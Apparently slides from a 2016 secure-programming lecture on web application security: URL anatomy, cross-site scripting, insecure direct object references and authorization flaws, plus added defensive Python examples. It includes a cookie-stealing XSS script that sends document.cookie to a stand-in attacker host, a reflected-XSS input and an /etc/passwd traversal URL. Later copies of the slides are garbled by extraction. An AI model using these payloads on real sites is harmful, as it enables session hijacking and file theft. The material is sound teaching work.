Secure Programming Lecture 11: Web Application Security II David Aspinall 26th February 2016

Secure Programming Lecture 11: Web Application Security II

David Aspinall

26th February 2016

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Recap

Programming web applications securely is perhaps the most important case of secure programming today.

• Web is ubiquitous
  • browsers on almost every device
  • cloud-provisioned applications on the rise
  • web becomes UI for DevOps, sysadmin

• Web technologies are ubiquitous
  • HTML5/JavaScript as a platform
  • replacing Flash, Silverlight, etc.
  • cross-platform app programming (Tizen, PhoneGap)

Although JS has serious drawbacks as a programming language, at least it provides memory safety.

OWASP Top 10 List

• A1 Injection Ø
• A2 Broken Authentication & Session Management Ø
• A3 Cross-Site Scripting (XSS)
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts.

URL anatomy: scheme://login:password@address:port/path/to/resource?query_string#fragment

1. scheme              scheme/protocol name
2. ://                 indicator of a hierarchical URL
3. login:password      credentials to access (optional)
4. address             server to retrieve the data from
5. port                port number to connect to (optional)
6. /path/to/resource   hierarchical Unix-style path
7. query_string        parameters (optional)
8. fragment            identifier (optional)

Parts 3-5 together are called the authority.

Scheme name

scheme:

A case-insensitive string; ends with a colon.

Officially registered names are assigned by IANA.

• http:, https:, ftp: and many others
  • in fact (2014): 87 permanent, 91 provisional, 9 historical
  • e.g. spotify:, nfs:, soap.beep:, tv:, paparazzi:

• also pseudo-URL, ad hoc schemes in browsers
  • e.g. javascript:, about:config

• and document fetching schemes sent to plugins/apps
  • e.g. mailto:, itms:, cf:

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must have the fixed string ://

• Otherwise URL is scheme-specific
  • e.g. mailto:bob@ed.ac.uk?subject=Hello

Idea: hierarchical URLs can be parsed generically.

Unfortunately:

• Original RFC 1738 didn't rule out non-hierarchical URLs that contain ://

• nor forbid (in practice) parsing URLs without ://

Consequence of under-specification

Despite motivations behind XHTML to stop bad HTML on the web, browser implementations are still (deliberately) lax, to try to be friendly to buggy web pages and bug-producing developers, and for backward compatibility. (Q: Why?)

For URLs which don't clearly conform to the original RFC, this leads to possibly unexpected treatments that vary between browsers:

http:example.com

javascript://example.com/%0Aalert(1)

mailto:user@example.com

Examples from The Tangled Web

Credentials

login:password@

• optional
  • if not supplied, browser acts "anonymously"
• Interpretation is protocol-specific
• Wide range of characters possible
  • some browsers reject certain punctuation chars

Exercise: When, and when not, might this be an appropriate authentication mechanism?

Server address

address

RFC is quite strict:

• case-insensitive DNS name (www.ed.ac.uk)
• IPv4: 129.215.233.64
• IPv6 in brackets: [2001:4860:a005:0:0:0:0:68]

Implementations are more relaxed:

• range of characters beyond DNS spec
• mix of digit formats: http://0x7f.1/ = http://127.0.0.1/

Question: Why is this relevant to secure web app programming?

Server port

:8080

A decimal number preceded by a colon.

Usually omitted: the default port number for the protocol used.

• e.g. 80 for HTTP, 443 for HTTPS, 21 for FTP
• sometimes servers on non-standard ports are useful

Question: What threats might this enable?

Hierarchical file path

/path/to/resource

• Unix-style, starts with /. Must resolve . and ..
• Relative paths allow for non-fully-qualified URLs
• old-style apps:
  • direct connection with file system
  • resource = HTML file served by server
• modern apps:
  • very indirect
  • complicated URL rewriting, dynamic content
  • paths mapped to parts of programs or database
  • server may be embedded in app

Question: What implications does this have for reviewing the security of web apps?

Query string

?search=purple+bananas

Optional, intended to pass arbitrary parameters to resource. Commonly used syntax

name1=value1&name2=value2

is not part of URL syntax. Syntax is related to mail, HTML forms. So:

• server may not presume/enforce query string format
• web applications may legally use other forms after ?

Fragment identifier

#lastsection

• Interpretation depends on client, resource type
  • in practice: anchor names in HTML elements
• Not intended to be sent to server
• Recent use: store client-side state while browsing
  • can be changed without page reload
  • easily bookmarked, shared
  • e.g. map locations

Exercise: Find some uses of fragments on web pages and servers. See what happens if they are sent to the server.

Metacharacters

• Some punctuation characters are not allowed
  • e.g. [ ] $ & ( ) =
• These are URL encoded with percent-ASCII hex
  • e.g. %2F encodes /, %25 encodes %

The RFC does not specify a fixed mapping, and browsers try to interpret as many user inputs as possible.

E.g. examples like http://%65xample.%63om/ may work in some browsers but not others. Some browsers will canonicalize the authority part of the URL, then even try a search (foo.com, www.foo.com, ...).

The RFCs are not always followed.

Non-ASCII text encodings in URLs

• Original standards did not allow for non-ASCII text
  • but clearly desirable for non-English text
• RFC 3492 introduced Punycode to allow behind-the-scenes DNS lookup
  • DNS lookup: xn--[US-ASCII]-[Unicode]
  • Browser: display Unicode part

Extension of 38 characters to 100,000 glyphs allowed many homograph attacks:

• pea.com has 5 identical-looking Cyrillic chars
• there are non-slash characters that look like /
• some attacks not easily prevented by DNS registrars

We have (puny) browser/search engine defences for this. Moral: probably better to stick with ASCII.

Overall consequences

Parsing URLs: more complicated than one might hope.

• better to use well-tested libraries than ad hoc code

But for output, want to be very careful:

• especially if URLs are made from user (attacker) input
• should canonicalize, then filter, reformat
• filter especially on the scheme and authority

Overall consequences

Eyeballs can easily be fooled when looking at URLs.

This is bad for ordinary users as well as web app developers.

http://example.com&gibberish=1234@167772161/

http://example.com\@coredump.cx/

http://example.com;.coredump.cx/

Which server is visited by each of these URLs?

Exercise: Try (carefully) visiting these URLs or others similar. Try asking some non-CS friends whose servers URLs like 'www.barclays.banking.com' go to.

Examples from The Tangled Web.
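The "canonicalize, then filter on scheme and authority, then reformat" advice above, worked through in Python. This is an added example, not code from the lecture or from The Tangled Web; the allow-list of schemes, the strict DNS-name pattern and the decision to refuse numeric hosts and any login:password@ section are this example's own assumptions. It parses with the standard library rather than ad hoc string handling, and rebuilds the URL from the validated parts instead of echoing the input.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Assumption: links we emit may only use web schemes (default ports listed so they can be dropped).
ALLOWED_SCHEMES = {"http": 80, "https": 443}

# Strict DNS-style host: dot-separated labels of [a-z0-9-], no leading or trailing hyphen.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_HOST_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def sanitize_url(raw: str):
    """Canonicalize a user-supplied URL for output, or return None if it must not be emitted.

    Order: parse with a well-tested library, canonicalize (lower-case scheme and host,
    drop the default port), filter on scheme and authority, then rebuild from the parts.
    """
    try:
        parts = urlsplit(raw.strip())
    except ValueError:
        return None

    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return None  # javascript:, data:, mailto: and unknown schemes are all refused

    # A login:password@ section makes the authority ambiguous to a human reader:
    # refuse it outright rather than trying to "fix" it.
    if "@" in parts.netloc or "\\" in parts.netloc:
        return None

    host = parts.hostname  # lower-cased by urlsplit; None when there is no authority at all
    if not host or not _HOST_RE.match(host):
        return None  # rejects "example.com;.coredump.cx", IPv6 literals, missing hosts

    # Refuse numeric hosts (127.0.0.1, 0x7f.1, 167772161): browsers parse them
    # inconsistently, so only DNS names pass through this sanitizer.
    if host.rsplit(".", 1)[-1].isdigit():
        return None

    try:
        port = parts.port  # ValueError for a non-numeric or out-of-range port
    except ValueError:
        return None
    netloc = host if port in (None, ALLOWED_SCHEMES[scheme]) else f"{host}:{port}"

    return urlunsplit((scheme, netloc, parts.path or "/", parts.query, parts.fragment))


if __name__ == "__main__":
    # Constructed inputs: the three Tangled Web examples from the slide plus benign ones.
    for candidate in [
        "HTTP://Example.COM:80/docs/?q=1#top",
        "http://example.com&gibberish=1234@167772161/",
        "http://example.com\\@coredump.cx/",
        "http://example.com;.coredump.cx/",
        "javascript://example.com/%0Aalert(1)",
        "http://0x7f.1/",
    ]:
        print(f"{candidate!r:50} -> {sanitize_url(candidate)!r}")
```

All three eyeball-fooling URLs from the slide are refused rather than "corrected": the first two carry a login section, the third has a character no DNS label may contain. Whether to accept IP-literal hosts at all is an application decision; this example treats "DNS name only" as the simplest rule to audit.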

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUR OUTPUTS

XSS attacks in general

• Attack typically on (another) user of the web app
• Attacker tricks app into displaying malicious code
  • typically script code

Many possible aims:

• display random images, popup windows
• change page contents, e.g. alter bank account number
• session hijacking: steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script:

  <script>
  document.location.replace("http://www.badguy.example/steal.php"
                            + "?what=" + document.cookie);
  </script>

• redirects victim's browser to attacker's site, passing cookie
• might also pass currently visited web page
  • then attacker's server can issue a redirect back again

Reflected XSS

Reflected XSS occurs when injected malicious code isn't stored in the server but is immediately displayed in the visited page. Suppose

http://mymanpages.org/manpage.php?title=Man+GCC&program=gcc

dynamically makes HTML embedding title directly:

<h1>Man GCC</h1>

An attacker could use this with a malicious input

title=<script>...</script>&program=gcc

which, e.g., steals a cookie.

Exercise: Explain how this attack works in practice.

XSS Solutions

Input processing is tricky: need to understand data flow through app, quoting, encoding, passed to/from functions, databases etc. Hence output filtering.

Plain output: HTML encoding

• Stored data values need to be encoded to represent in HTML (e.g. < converted to &lt; etc.)

Marked up output: complex filtering

• Need to work through tags in input and rule out risky ones. Scripts may appear in attributes. Flaky.

Marked up output: DSL

• A better approach: use a dedicated syntax, convert to restricted subset of HTML.
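The three output strategies on this slide, as an added Python example (not code from the lecture): HTML encoding for plain output in both text and attribute context, shown on the manpage.php title from the reflected XSS slide, and a tiny DSL that is converted to a restricted HTML subset. The DSL syntax (*bold* and [label](url)) and the function names are this example's own assumptions. The point the DSL approach makes is that everything is encoded first, so the only tags in the output are the ones the converter itself emits.

```python
import html
import re


def encode_text(value: str) -> str:
    """Encode a data value for an HTML text node: &, < and > become entities."""
    return html.escape(value, quote=False)


def encode_attr(value: str) -> str:
    """Encode a data value for a quoted HTML attribute: also escapes both quote characters."""
    return html.escape(value, quote=True)


def render_title(title: str) -> str:
    """The manpage.php <h1> from the slide, built with encoding instead of raw embedding."""
    return f"<h1>{encode_text(title)}</h1>"


def render_search_link(query: str) -> str:
    """Attribute context: the same value needs quote escaping when it lands inside href."""
    return f'<a href="/search?q={encode_attr(query)}">{encode_text(query)}</a>'


# Minimal markup DSL (an assumption for this example): *bold* and [label](http-url).
_BOLD = re.compile(r"\*([^*\n]+)\*")
_LINK = re.compile(r"\[([^\]\n]+)\]\(([^)\s]+)\)")


def to_restricted_html(text: str) -> str:
    """Convert DSL text to a restricted HTML subset.

    Everything is encoded first, so no tag or attribute from the input can survive;
    the only markup in the output is what this function itself emits.
    """
    out = encode_attr(text)  # quotes escaped too, so a URL can sit inside href="..."
    out = _BOLD.sub(r"<b>\1</b>", out)

    def link(match: re.Match) -> str:
        label, href = match.group(1), match.group(2)
        if href.lower().startswith(("http://", "https://")):
            return f'<a href="{href}">{label}</a>'
        return label  # javascript: and other schemes degrade to plain text

    return _LINK.sub(link, out)
```

Note that the text-node encoder deliberately leaves quotes alone while the attribute encoder does not: the right encoding depends on where in the HTML the value lands, which is why "filter on output" has to know its context.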

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=release%2FUserman.html#Introduction

A "cool" PHP script showhtml.php:

• take a plain HTML file
• wrap it with navigation links, site style
• convert the internal links to reference back to the wrapped version

Embarrassing PHP blunders

http://researchsite.ed.ac.uk/showhtml.php?title=User+Manual&file=%2Fetc%25passwd

• remote users can visit any file on the system
• mistake motivates defence-in-depth:
  • http server should not serve up any file
  • use internal web server config (separate apps)
  • and external OS config (e.g. nobody user, chroot)

Authorization and object access

What was the problem here?

• the app developer (implicitly) authorized users
  • to read documentation files he had created
  • project was open source, no need for logins
  • app contained no paths to files outside the project
  • so no explicit authorization code was written
• but PHP code didn't check the filename returned
  • showhtml.php provided access to server objects
  • input validation only checked for file existence

There should have been a re-authorization step. A well-written app should only allow access to its own resources.
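What the missing check in showhtml.php would look like, as an added Python example (not the lecture's or the original script's code). DOC_ROOT is a hypothetical document directory; the function takes the file parameter as a web framework hands it over, already URL-decoded once, and deliberately does not decode it again. Instead of testing only that the file exists, it canonicalizes the path and confirms it still lies inside the application's own resource tree.

```python
import os

# Hypothetical directory that a showhtml.php-style script is meant to serve from.
DOC_ROOT = "/srv/docs"


def resolve_doc_path(user_file: str):
    """Map a client-supplied 'file' parameter to a path inside DOC_ROOT, or None.

    Existence is not the test: the test is whether the canonical path still lies
    under the application's own resource tree after '..' and symlinks are resolved.
    """
    if not user_file or "\0" in user_file or os.path.isabs(user_file):
        return None  # empty, NUL-truncation tricks and absolute paths are refused up front
    root = os.path.realpath(DOC_ROOT)
    candidate = os.path.realpath(os.path.join(root, user_file))  # normalizes '..' and symlinks
    if os.path.commonpath([root, candidate]) != root:
        return None  # escaped the tree, e.g. via ../../etc/passwd
    return candidate


if __name__ == "__main__":
    # Constructed inputs: the documented use and a few escape attempts.
    for value in ["release/Userman.html", "/etc/passwd", "../../etc/passwd", "release/../../../etc/passwd"]:
        print(f"{value!r:35} -> {resolve_doc_path(value)!r}")
```

This is the in-app check; the slide's point about defence-in-depth still stands, since a web server and OS configuration that refuse to serve anything outside the tree protect against the day this check is bypassed or forgotten.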

Looking at anyonersquos bank account

<form action="show-account.asp" method="get">
Account to display:
<select name="account">
<option value="12345678901">12345678901</option>
<option value="12346543210">12346543210</option>
</select>
<input type="submit" name="show" value="Show Account">
</form>

Example from Innocent Code, based on a Norwegian newspaper story about a "17-year geek able to view anyone's bank account".

Solutions for object referencing

Re-validate

• Check authorization again
• Obvious solution, but duplicates effort

Add a data indirection

• Session-specific server-side array of account nos.

<option value="1">12345678901</option>
<option value="2">12346543210</option>

• Similarly for file access

http://researchsite.ed.ac.uk/showhtml.php?file=1#Introduction

for many files, a hash table or database could be used.
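The data-indirection solution, as an added Python example (not the lecture's code). The session is modelled as a plain dict and the function names are this example's own; the technique is the slide's: the real account numbers or file names stay in server-side, session-specific state, the client only ever sees small indices, and a value the client sends back is resolved against that table rather than used directly.

```python
import html


def expose_references(session: dict, object_ids) -> list:
    """Store the real identifiers in this session and return (index, id) pairs for rendering.

    The client only ever sees the indices; the table lives in this session's state,
    so an index from another user's session resolves to nothing here.
    """
    table = {str(i): oid for i, oid in enumerate(object_ids, start=1)}
    session["object_map"] = table
    return list(table.items())


def resolve_reference(session: dict, client_value: str):
    """Map a client-supplied index back to a real identifier; None if it is not one we issued."""
    return session.get("object_map", {}).get(client_value)


def render_account_options(session: dict, accounts) -> str:
    """Emit the <option> list from the slide, with indices instead of account numbers as values."""
    return "\n".join(
        f'<option value="{index}">{html.escape(oid, quote=True)}</option>'
        for index, oid in expose_references(session, accounts)
    )


if __name__ == "__main__":
    # Constructed session and account numbers (the two from the slide).
    session = {}
    print(render_account_options(session, ["12345678901", "12346543210"]))
    print(resolve_reference(session, "2"))            # the second account
    print(resolve_reference(session, "12345678901"))  # a direct reference: not issued, so None
```

The same two functions serve the file case: expose_references over the project's documentation paths, and showhtml.php-style code resolving file=1 through the table. Resolving returns None for anything the server did not hand out, so the direct-reference and path-guessing cases on the earlier slides never reach the file system or the account lookup.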

Passing too much information

Old flaw: passing unnecessary information to the client and expecting it back unmodified.

<form action="/cgi-bin/cgimail.exe" method="post">
<input type="hidden" name="$File$" value="templates/feedback.txt">
<input type="hidden" name="$To$" value="feedback@somesite.example">
</form>

Protecting information in server data

Sometimes the server must pass information to the client during the interaction, but must protect it.

Example: editing a wiki page

<form>
<input type="hidden" name="pagename" value="NineteenSixtiesToys">
<textarea cols="80" rows="25" name="wpText">
</textarea>
</form>

Solution: add a MAC constructed with a server-side secret key:

<input type="hidden" name="pagemac" value="bc9faaae1e35d52f3dea9651da12cd36627b8403">

Or could encrypt the pagename.
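The MAC solution for the wiki form, as an added Python example (not the lecture's code). The slide's pagemac value has the length of a SHA-1 digest; this example uses HMAC-SHA256 from the standard library, which is an assumption, as are the function names and the secret, which is generated at start-up here so the demo runs but would be loaded from server configuration in practice. The MAC covers the field name as well as the value, so a MAC minted for pagename cannot be replayed on a different field, and verification uses a constant-time comparison.

```python
import hashlib
import hmac
import html
import secrets

# Assumption: a per-deployment secret loaded from server configuration; generated here for the demo.
SERVER_SECRET = secrets.token_bytes(32)


def mac_field(name: str, value: str, key: bytes = SERVER_SECRET) -> str:
    """HMAC-SHA256 over name=value, binding the MAC to the field it protects."""
    return hmac.new(key, f"{name}={value}".encode("utf-8"), hashlib.sha256).hexdigest()


def hidden_fields(pagename: str) -> str:
    """The two hidden inputs from the wiki example: the value and its MAC."""
    return (
        f'<input type="hidden" name="pagename" value="{html.escape(pagename, quote=True)}">\n'
        f'<input type="hidden" name="pagemac" value="{mac_field("pagename", pagename)}">'
    )


def verify_pagename(form: dict):
    """Return the submitted pagename only if its MAC checks out; otherwise None."""
    pagename = form.get("pagename", "")
    expected = mac_field("pagename", pagename)
    # compare_digest avoids leaking how many leading characters matched through timing.
    if hmac.compare_digest(expected, form.get("pagemac", "")):
        return pagename
    return None


if __name__ == "__main__":
    # Constructed round trip: what the server emits, then what a client posts back.
    print(hidden_fields("NineteenSixtiesToys"))
    submitted = {"pagename": "NineteenSixtiesToys",
                 "pagemac": mac_field("pagename", "NineteenSixtiesToys")}
    print(verify_pagename(submitted))                                  # accepted
    print(verify_pagename({**submitted, "pagename": "AdminSettings"}))  # tampered: None
```

A MAC keeps the value readable by the client but unforgeable; the slide's alternative, encrypting pagename, additionally hides it, at the cost of the server having to decrypt and still validate the result.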

Other authorization mistakes

Assuming requests occur in proper order

• For an admin task (e.g. password reset), assuming that the user must have issued a GET to retrieve a form before a POST
  • only checking authorization on the first step

Authorization by obscurity

• Supposing that because a web page is not linked to the main site, only people who are given it will be able to reach it

http://www.myserver.com/secretarea/privatepaper.pdf

Outline

Overview

Essential Basics: URLs

Output Filtering and XSS

Object references

Summary

Review questions

URLs

• Recap the 8 components of a URL. From a server-side point of view, which of these is trustworthy? From the web app viewpoint, which of these is it most important to validate in output, to protect your users?

XSS

• Explain how session stealing works with XSS. How could a reflected XSS attack steal a session?

Object references

• Why is it important to add defence-in-depth when configuring web servers? Give three examples of ways in which a web application may be restricted by a (separate) server.

References

Some commentary and examples were taken from the texts:

• Innocent Code: a security wake-up call for web programmers, by Sverre H. Huseby, Wiley 2004

• The Tangled Web: a Guide to Securing Modern Web Applications, by Michal Zalewski, No Starch Press 2012

as well as the named RFCs.

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 2: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the riseEacute web becomes UI for DevOps sysadmin

Eacute Web technologies are ubiquitousEacute HTML5JavaScript as a platformEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)

Although JS has serious drawbacks as a programming language atleast it provides memory safety

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

Full URLs specified in RFC 3986 have up to eight parts

URL anatomyschemeloginpasswordaddressportpathtoresourcequery_stringfragment

1 scheme Schemeprotocol name2 Indicator of a hierarchical URL3 loginpassword credentials to access (optional)4 address server to retrieve the data from5 port port number to connect to (optional)6 pathtoresource hierarchical Unix-style path7 query_string parameters (optional)8 fragment identifier (optional)

Parts 3-5 together are called the authority

Scheme name

scheme

A case-insensitive string ends with a colon

Officially registered names are assigned by IANA

Eacute http https ftp and many othersEacute in fact (2014) 87 permanent 91 provisional 9

historicalEacute eg spotify nfs soapbeep tv paparazzi

Eacute also pseudo-URL adhoc schemes in browsersEacute eg javascript about config

Eacute and document fetching schemes sent topluginsappsEacute eg mailto itms cf

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 3: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Recap

Programming web applications securely is perhapsthe most important case of secure programming today

Eacute Web is ubiquitousEacute browsers on almost every deviceEacute cloud provisioned applications on the riseEacute web becomes UI for DevOps sysadmin

Eacute Web technologies are ubiquitousEacute HTML5JavaScript as a platformEacute replacing Flash Silverlight etcEacute cross-platform app programming (Tizen PhoneGap)

Although JS has serious drawbacks as a programming language atleast it provides memory safety

OWASP Top 10 List

Eacute A1 Injection OslashEacute A2 Broken Authentication amp Session Management OslashEacute A3 Cross-Site Scripting (XSS)Eacute A4 Insecure Direct Object ReferencesEacute A5 Security MisconfigurationEacute A6 Sensitive Data ExposureEacute A7 Missing Function Level Access ControlEacute A8 Cross-Site Request Forgery (CSRF)Eacute A9 Using Components with Known VulnerabilitiesEacute A10 Unvalidated Redirects and Forwards

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Structure of URLs

